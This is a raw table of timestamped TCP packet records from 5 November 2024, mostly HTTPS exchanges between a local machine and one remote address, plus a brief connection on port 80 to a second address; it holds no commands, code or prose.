Nov 5, 2024 18:46:01.162383080 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.162440062 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.162574053 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.162585020 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.438473940 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.439534903 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.439548016 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.439940929 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.439945936 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.476952076 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.477314949 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.477327108 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.477859020 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.477865934 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.487011909 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.487348080 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.487371922 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.487857103 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.487863064 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.544008970 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.544500113 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.544507027 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.545036077 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.545039892 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.568423033 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.569149017 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.569202900 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.569295883 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.569310904 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.569346905 CET	49768	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.569351912 CET	443	49768	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.572387934 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.572413921 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.572480917 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.572632074 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.572647095 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.604435921 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.605107069 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.605165958 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.605202913 CET	49770	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.605214119 CET	443	49770	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.607798100 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.607825994 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.607876062 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.608052969 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.608063936 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.619386911 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.619545937 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.619601965 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.619647980 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.619647980 CET	49769	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.619657993 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.619664907 CET	443	49769	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.622502089 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.622513056 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.622627020 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.622766972 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.622780085 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.672645092 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.672697067 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.672736883 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.672873974 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.672878027 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.672936916 CET	49771	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.672940969 CET	443	49771	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.674976110 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.674988031 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.675276041 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.675520897 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.675529957 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.905158043 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.911536932 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.911561966 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:01.912172079 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:01.912177086 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.041325092 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.041893005 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.041985035 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.042196989 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.042216063 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.042222977 CET	49772	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.042232990 CET	443	49772	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.044385910 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.044420958 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.044493914 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.044615030 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.044625998 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.310128927 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.315642118 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.315665007 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.324348927 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.324354887 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.341955900 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.346759081 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.346786976 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.357824087 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.357829094 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.363132954 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.371788025 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.371797085 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.375813961 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.375819921 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.431826115 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.436067104 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.436084986 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.451210022 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.451431990 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.451545000 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.454560995 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.454566956 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.454880953 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.454889059 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.454900026 CET	49773	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.454905033 CET	443	49773	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.458084106 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.458102942 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.458185911 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.458283901 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.458303928 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.493556023 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.494354963 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.494438887 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.498213053 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.498228073 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.498236895 CET	49774	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.498241901 CET	443	49774	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.503411055 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.503571987 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.503633976 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.507173061 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.507179022 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.507188082 CET	49775	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.507191896 CET	443	49775	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.509018898 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.509051085 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.509107113 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.510086060 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.510097027 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.510144949 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.510209084 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.510221004 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.510298014 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.510310888 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.578591108 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.578716993 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.578795910 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.604020119 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.604027987 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.604038000 CET	49776	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.604042053 CET	443	49776	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.622420073 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.622443914 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.622499943 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.622620106 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.622631073 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.776824951 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.777435064 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.777446032 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.778136015 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.778141022 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.906584024 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.906701088 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.906853914 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.906874895 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.906888962 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.906899929 CET	49777	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.906904936 CET	443	49777	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.909646988 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.909661055 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:02.909749031 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.909900904 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:02.909912109 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.195399046 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.196013927 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.196029902 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.196403980 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.196408987 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.254518032 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.255368948 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.255379915 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.255738020 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.255743027 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.258522034 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.259355068 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.259365082 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.259679079 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.259681940 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.326245070 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.326322079 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.326381922 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.326529980 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.326541901 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.326554060 CET	49778	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.326558113 CET	443	49778	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.328988075 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.329025984 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.329195976 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.329377890 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.329390049 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.352802038 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.353213072 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.353229046 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.353574038 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.353579044 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.388096094 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.388328075 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.388380051 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.388533115 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.388547897 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.388556957 CET	49779	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.388562918 CET	443	49779	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.390636921 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.390666008 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.390841961 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.390971899 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.390985966 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.392499924 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.392565012 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.392621040 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.392735004 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.392743111 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.392755032 CET	49780	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.392760038 CET	443	49780	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.394753933 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.394783020 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.394846916 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.395131111 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.395142078 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.451642990 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:03.457022905 CET	80	49786	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:03.457108974 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:03.457326889 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:03.462814093 CET	80	49786	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:03.482712030 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.482848883 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.482920885 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.483028889 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.483050108 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.483059883 CET	49781	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.483064890 CET	443	49781	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.485342026 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.485375881 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:03.485456944 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.485563993 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:03.485577106 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.130790949 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.131333113 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.131347895 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.132044077 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.132050991 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.234872103 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.235424995 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.235451937 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.235888958 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.235894918 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.259958029 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.260121107 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.260201931 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.260266066 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.260278940 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.260288954 CET	49784	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.260293007 CET	443	49784	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.263032913 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.263060093 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.263149023 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.263328075 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.263338089 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.371526957 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.371597052 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.371665001 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.371815920 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.371830940 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.371840954 CET	49787	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.371846914 CET	443	49787	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.374022961 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.374049902 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.374138117 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.374286890 CET	49789	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.374300003 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.415158987 CET	80	49786	185.215.113.43	192.168.2.4
Nov 5, 2024 18:46:04.415246010 CET	49786	80	192.168.2.4	185.215.113.43
Nov 5, 2024 18:46:04.450676918 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.451047897 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.451066971 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.451407909 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.451411963 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.517119884 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.519196033 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.519216061 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.519597054 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.519603014 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.580364943 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.580642939 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.580704927 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.580739975 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.580739975 CET	49783	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.580754042 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.580760956 CET	443	49783	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.583203077 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.583216906 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.583300114 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.583465099 CET	49790	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.583477974 CET	443	49790	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.649238110 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.649481058 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.649549961 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.649610043 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.649621010 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.649632931 CET	49785	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.649636984 CET	443	49785	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.651701927 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.651716948 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.651777983 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.651894093 CET	49791	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.651905060 CET	443	49791	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.684608936 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.685904026 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.685926914 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.686275959 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.686280966 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.814524889 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.814835072 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.814915895 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.815190077 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.815200090 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.815210104 CET	49782	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.815212965 CET	443	49782	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.818694115 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.818721056 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:04.818798065 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.818912983 CET	49792	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:04.818928003 CET	443	49792	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.021387100 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.068857908 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.086990118 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.086996078 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.090675116 CET	49788	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:05.090679884 CET	443	49788	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.112541914 CET	443	49789	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:05.117675066 CET	49789	443	192.168.2.4	13.107.246.45
